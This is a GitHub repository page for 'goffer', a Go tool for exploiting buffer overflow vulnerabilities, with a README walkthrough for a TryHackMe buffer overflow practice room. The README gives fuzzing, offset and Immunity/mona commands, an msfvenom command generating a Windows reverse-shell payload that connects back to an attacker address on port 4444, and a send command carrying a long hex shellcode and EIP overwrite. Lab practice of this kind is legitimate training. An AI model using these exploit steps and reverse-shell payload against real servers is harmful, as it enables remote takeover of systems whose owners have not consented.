Skip to content

souvikhaldar/goffer

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

24 Commits

cmd

cmd

 
 

pkg

pkg

 
 

.cobra.yaml

.cobra.yaml

 
 

.gitignore

.gitignore

 
 

LICENSE

LICENSE

 
 

README.md

README.md

 
 

allhex.txt

allhex.txt

 
 

go.mod

go.mod

 
 

go.sum

go.sum

 
 

main.go

main.go

 
 

Repository files navigation

Goffer

A powerful tool for hacking insecure servers with buffer overflow vulnerability. Written in go.

Installation

  1. Install Go.
  2. go get github.com/souvikhaldar/goffer

Steps for tryhackme buffer overflow prepation room:

Youtube link for below steps

  1. Set working directory in immunity: !mona config -set workingfolder c:\mona\%p
  2. Fuzz: goffer fuzz -i 10.10.130.130 -p 1337 -c "OVERFLOW1 "
  3. Find EIP address: goffer offset -i 10.10.130.130 -l 2100 -p 1337 -c "OVERFLOW1 "
  4. Generate bytearray to find bad chars: !mona bytearray -b "\x00"
  5. Compare this generated bytearray with contents of your stack: Eg. !mona compare -f c:\mona\vulnserver\bytearray.bin -a 00C0F9C8
  6. Check which modules have all security turned off: !mona modules
  7. Find address of JMP ESP instruction in module xyz which doesn't have badchar 00 in immunity debugger: !mona jmp -r esp -cpb "\x00" -m xyz
  8. Set a breakpoint at the above instruction's address and put this address (in reverse) in the EIP to check if we can reach this point.
  9. Now put the shellcode in the stack (starting at ESP) and prepended with NOPs. You can use the following msfvenom command to create a reverse shell shellcode for windows: msfvenom -p windows/shell_reverse_tcp LHOST=10.9.3.249 LPORT=4444 EXITFUNC=thread -b "\x00\x07\x08\x2e\x2f\xa0\xa1" -f hex
    then use the following goffer command to set this shellcode into the stack and place the JMP ESP instruction's address in the EIP (eg.): goffer send -i 10.10.101.55 -p 1337 -c "OVERFLOW1 " -a 1978 --eip af115062 --esp 90909090909090909090909090dadcd97424f45ab811464c5131c9b15283eafc314213035355aea4afb1ac474f42d1ceaa73d1b5bf24e1beedc88a93055afe3b2aebb51d05ece65e046ef5b2e64f36c7e7882b2ab541279929e57d22c2b59022370d9203e605cd8309c9658a110e4344aae43f577a35bff443f93204843ead73fc3c50843b3e8e01df9845b13b188924c8166622963a79e7ad47f20661ce402da58a134cfc76f5711ed9aad755f4bf6534910c44c6611bdfb553844b51d84d52a61f642238de87531125d303098c5cc8c931895f999d6220495ed3c883510ce8acbb2583572c405d54553c5f5ab4e1d6bcdc09bf1749b39ae3e83c318e2bb6b66fe53fb26392cf89d935cf2775d942ac85947e7bd2f1b172b6efe82ca4ed6d166c2a4e996dbfeabd7d79f2f929d5a55787931f16714af3f0150b3fc363146ab58ba5c380b40a8404cd7634ea043354098c4efd9445f36027b0309da430c95ab431cc2772aabc3817cc133832

Steps for solving vulnserver with goffer

Using Goffer for hacking vulnserver

About

Perform buffer overflow vuln testing and exploit

Resources

Readme

License

Apache-2.0 license
Activity

Stars

3 stars

Watchers

2 watching

Forks

0 forks
Report repository

Releases

1 tags

Packages

No packages published

Languages